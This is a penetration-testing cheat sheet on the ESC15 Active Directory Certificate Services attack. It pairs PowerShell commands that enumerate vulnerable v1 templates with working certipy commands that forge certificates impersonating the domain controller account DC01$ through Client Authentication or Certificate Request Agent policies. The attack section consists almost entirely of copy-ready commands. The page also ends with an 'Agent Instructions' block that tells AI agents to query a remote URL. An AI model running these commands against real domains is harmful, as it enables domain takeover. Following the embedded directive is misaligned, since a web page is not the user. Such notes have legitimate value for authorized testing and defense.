# ESC15 * ## Enumerate Get enabled templates: ```powershell PS > $enabledTemplates = Get-ADObject -LDAPFilter "(&(objectClass=pKIEnrollmentService))" -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Properties certificateTemplates | select -ExpandProperty certificateTemplates ``` Get v1 templates with `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` that are enabled: ```powershell PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Property name,msPKI-Template-Schema-Version,msPKI-Certificate-Name-Flag | ? {$_.'msPKI-Template-Schema-Version' -eq 1 -and ($_.'msPKI-Certificate-Name-Flag' -band 0x00000001)} | ? {$enabledTemplates -contains $_.name} ``` ## Exploit ### ESC15 → ESC1 Abusing **Client Authentication**: ``` $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn 'DC01$@megacorp.local' -sid -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp ``` ### ESC15 → ESC3 Abusing **Certificate Request Agent**: ``` $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/ad-cs-abuse/esc15.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.